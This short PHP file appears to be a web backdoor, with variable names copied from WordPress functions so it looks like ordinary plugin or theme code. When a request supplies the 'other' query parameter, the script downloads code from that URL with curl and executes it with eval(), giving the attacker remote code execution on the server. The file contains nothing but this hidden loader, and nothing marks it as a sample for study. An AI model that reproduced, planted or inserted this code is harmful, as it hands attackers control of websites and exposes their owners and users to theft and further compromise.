<?php

if (isset($_GET['other'])) {
    $get_the_modified_date_bl = $_GET['other'];
    if ($number_format_i18n_fwe = curl_init()) {
        curl_setopt($number_format_i18n_fwe, CURLOPT_URL, $get_the_modified_date_bl);
        curl_setopt($number_format_i18n_fwe, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($number_format_i18n_fwe));
        curl_close($number_format_i18n_fwe);
        exit;
    }
}